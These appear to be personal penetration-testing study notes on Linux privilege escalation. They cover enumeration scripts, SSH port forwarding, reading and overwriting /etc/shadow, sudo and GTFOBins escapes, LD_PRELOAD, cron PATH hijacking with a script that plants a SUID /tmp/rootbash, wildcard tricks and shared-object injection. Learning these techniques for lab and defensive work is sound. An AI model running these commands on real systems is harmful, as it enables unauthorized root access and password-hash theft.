linux smart enumeration#

./lse.sh # for normale use
# if none of the first command usefull u can go deeper with
./lse.sh -l 1 -i
./lse.sh -l 2 -i # this will print everything the script gathers

LinEnum#

./LinEnum.sh -k password -e exportsFolder -t # -k for keywords, -e where u want interesting files to be exported, -t to include thorough tests

Port Forwarding#

ssh -R <local-port>:127.0.0.1:<service-port> <username>@<local-machine>
# example
ssh -R 4444:127.0.0.1:3306 root@192.168.1.26
# in ur kali machine
mysql -u root -h 127.0.0.1 -P 4444

/etc/shadow file#

from lse.sh we can see the /etc/shadow file is readable and writeble, we can confirm that with :

# u can read the /etc/shadow and break the hash with john
cat /etc/shadow
# if we can write to the /etc/shadow file that mean we can generate hash from password and replace the root password
mkpasswd -m sha-512 newpasswordhere

/etc/passwd file#

• for backwards compatibility, if the second field of a user row in /etc/passwd contains hash, it takes precedent over /etc/shadow

Shell Escape Sequences#

runing sudo -l show us that we can run some command as root, searching in GTFOBins we can locate these commands for root usage

Abusing Intended Functionality#

from sudo -l we can run apache2 as root but there is no esacape sequence presented in GTFOBins, alternatvly apache2 throw error in file cant understandn we can use that to read the 1st line in /etc/shadow

Environment Variables#

• env_reset
• env_keep
• env_keep+=LD_PRELOAD
• env_keep+=LD_LIBRARY_PATH
  • the ldd command can be user to print the shared libraries used by program

File Permissions#

if we can write to program or script which gets run as cronjob, we can replace it

PATH Environment Variable#

from lse.sh we can locate some writable paths in cron jobs if we can controle the Path we can see if there is creonjobs that not use the full path and try to create script with the same name in the path we controle

#!/bin/bash

cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash

Make sure that the file is executable:

chmod +x /home/user/overwrite.sh
watch -n 1 ls -l /tmp
/tmp/rootbash -p

Wildcards#

this example can explain the concept :

ls *
touch ./-l
ls *

from GTFOBins we can check if we can spone shell from the command or not

Finding SUID / SGID Files#

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

after locating some programs we can use shell Escape Sequences or search for know exploits

Shared Object Injection#

by using a program called strace we can track shared object called, and see if there is missing ones, then we can change it with our Object

strace /path/to/program 2>&1 | grep -iE "open|access|no such file"

PATH Environment Variable#

strings /path/to/file
strace -v -f -e execve <command> 2>&1 | grep exec
ltrace <command>